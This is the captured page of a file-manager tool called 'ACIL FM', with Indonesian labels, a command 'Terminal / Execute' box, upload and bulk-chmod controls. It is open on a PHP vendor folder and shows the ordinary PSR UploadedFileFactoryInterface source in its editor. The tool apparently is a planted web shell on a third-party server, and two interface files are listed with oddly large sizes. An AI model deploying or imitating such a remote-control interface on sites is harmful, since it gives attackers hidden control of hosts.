ACIL FM
Dark
Refresh
Current DIR:
/home/mhhtmff/app/NH-HR-test-old/vendor/psr/http-factory/src
/
home
mhhtmff
app
NH-HR-test-old
vendor
psr
http-factory
src
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
RequestFactoryInterface.php
499 B
chmod
View
DL
Edit
Rename
Delete
ResponseFactoryInterface.php
546 B
chmod
View
DL
Edit
Rename
Delete
ServerRequestFactoryInterface.php
927 B
chmod
View
DL
Edit
Rename
Delete
StreamFactoryInterface.php
1.38 MB
chmod
View
DL
Edit
Rename
Delete
UploadedFileFactoryInterface.php
1.1 MB
chmod
View
DL
Edit
Rename
Delete
UriFactoryInterface.php
325 B
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/mhhtmff/app/NH-HR-test-old/vendor/psr/http-factory/src/UploadedFileFactoryInterface.php
<?php namespace Psr\Http\Message; interface UploadedFileFactoryInterface { /** * Create a new uploaded file. * * If a size is not provided it will be determined by checking the size of * the file. * * @see http://php.net/manual/features.file-upload.post-method.php * @see http://php.net/manual/features.file-upload.errors.php * * @param StreamInterface $stream Underlying stream representing the * uploaded file content. * @param int|null $size in bytes * @param int $error PHP file upload error * @param string|null $clientFilename Filename as provided by the client, if any. * @param string|null $clientMediaType Media type as provided by the client, if any. * * @return UploadedFileInterface * * @throws \InvalidArgumentException If the file resource is not readable. */ public function createUploadedFile( StreamInterface $stream, ?int $size = null, int $error = \UPLOAD_ERR_OK, ?string $clientFilename = null, ?string $clientMediaType = null ): UploadedFileInterface; }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply